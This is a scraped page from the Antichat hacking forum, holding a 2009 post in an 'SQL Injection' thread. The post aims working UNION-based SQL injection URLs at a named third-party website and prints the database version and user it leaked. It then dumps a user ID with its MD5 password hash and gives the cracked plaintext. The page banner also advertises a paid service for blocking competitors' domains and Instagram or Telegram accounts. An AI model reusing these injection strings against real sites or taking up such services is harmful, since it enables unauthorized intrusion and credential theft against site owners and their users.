Форум АНТИЧАТ - SQL Инъекции

VIDEO.ANTICHAT.XYZ

НОВЫЕ СООБЩЕНИЯ

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Опции темы

Поиск в этой теме

Опции просмотра

Предыдущая

Предыдущее сообщение

Следующее сообщение

Следующая

#11

Старый

10.06.2009, 15:53

Аватар для AlexSatter

AlexSatter

Постоянный

Регистрация: 29.01.2009

Сообщений: 333

Провел на форуме:
1168802

Репутация: 298

По умолчанию

PR0, ТИЦ 0
http://www.zhukovs.ru/text.php?id=-9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),user(),database()),9,10,11/*
4.0.20-log:brainz@localhost:brainz
Есть база users, поля подобрал только user_id, user_password... искал где хранится имя пользователя, ... кончилась фантазия.
http://www.zhukovs.ru/text.php?id=-9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user_i d,user_password),9,10,11+from+users/*
1:76a2173be6393254e72ffa4d6df1030a
Хэш расшифровался легко:
76a2173be6393254e72ffa4d6df1030a = passwd

Ответить с цитированием

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход